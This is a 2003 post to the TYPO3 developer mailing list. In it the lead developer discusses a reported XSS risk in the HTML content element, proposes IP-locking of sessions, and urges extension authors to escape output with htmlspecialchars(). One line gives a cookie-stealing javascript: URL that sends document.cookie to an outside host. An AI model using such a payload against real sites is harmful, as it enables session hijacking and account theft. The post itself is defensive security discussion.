[Typo3-dev] Security Problem - HTML

=?us-ascii?Q?=22Kasper_Sk=E5rh=F8j=22?= kasper at typo3.com
Wed Sep 24 09:07:35 CEST 2003


My opinion:

- The security should be heightened with check for the IP in addition to the cookie. That check will be configurable in the TYPO3_CONF_VARS (for both FE + BE logins) with a default value of "enabled" (thus people with isdn/phonelines can still disable it if annoying).

Apart from that what they describe is not a bug but a feature: The point of the HTML element is that the user can insert HTML! They can spoil many things with that. In fact the report is not very visionary since a much smarter approach would be to [...i'll keep the details for myself so kiddies don't get funny ideas...] - thus you get yourself a nice backend account with admin-rights and don't have to worry about the IP-lock we are going to implement now!
OK, so let us parse the HTML - however that is not even close to a solution since most other elements allows HTML.
So what about parsing all text? Well, backend administrators can still insert links like "javascript:document.location='http://mydomain/?cookie='+document.cookie" - although it requires people to click the link which the other solution doesn't

The solution is of course to highten security with additional measures like the existing IP-locking, with buglar-alarms (like the mail-warnings), http-auth protection, etc.
Further backend users should be "trusted" users to some degree and bitching over a backend users ability to enter harmful HTML is really nothing compared to the potential number of security holes in extensions where users using the *website* (non-trusted) could inject HTML or more potentially a "javascript:...." as a URL in a messageboard.

But ok, lets make the IP-lock. But there is no way around it; your backend users are given a certain amount of potential to harm you and your site and you should therefore be able to trust them. And then lets focus on the real danger which are frontend plugins which allows outsiders to enter information which are subsequently displayed on the webpage.

For extension designers and others interested, please read the security section in "Inside TYPO3" (or is it the Coding Guidelines document?) where it is clearly explained what measures you can take against XSS (Cross Site Scripting). You can start with simply remembering to pipe all your output through "htmlspecialchars()" ... (which is not done in the HTML CE since ... that is the point!)


- kasper
-------------------- o ---------------------
>>>    In God I trust - others pay cash!     <<<
Check www.typo3.com







More information about the TYPO3-dev mailing list